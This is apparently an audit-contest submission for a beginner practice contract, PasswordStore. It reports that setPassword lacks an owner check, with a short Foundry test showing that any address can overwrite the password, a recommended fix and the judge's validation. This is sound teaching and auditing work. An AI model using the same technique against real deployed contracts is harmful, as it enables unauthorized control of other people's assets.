First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Anyone can set a new Password

light

Summary

It is specified that only the contract owner should be able to change the password. However setPassword doesn't check if the message sender is the owner, allowing anyone to set a new password.

Vulnerability Details

The vulnerability allows any user to call the setPassword function and set a new password, as shown in the following foundry PoC:

function test_anyone_can_set_password() public {
vm.startPrank(address(1));
string memory expectedPassword = "myNewPassword";
passwordStore.setPassword(expectedPassword);
vm.stopPrank();
vm.startPrank(owner);
string memory actualPassword = passwordStore.getPassword();
assertEq(actualPassword, expectedPassword);
}
[PASS] test_anyone_can_set_password() (gas: 22876)
Test result: ok. 1 passed; 0 failed; finished in 1.18ms

Impact

Anyone can change the password, violating the intention of the smart contract.

Tools Used

Foundry, manual review

Recommendations

Add the following verification before changing the value of s_password in setPassword()

if (msg.sender != s_owner) {
revert PasswordStore__NotOwner();
}
Updates

Lead Judging Commences

inallhonesty Lead Judge
about 2 years ago
inallhonesty Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-lacking-access-control

Anyone can call `setPassword` and set a new password contrary to the intended purpose.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.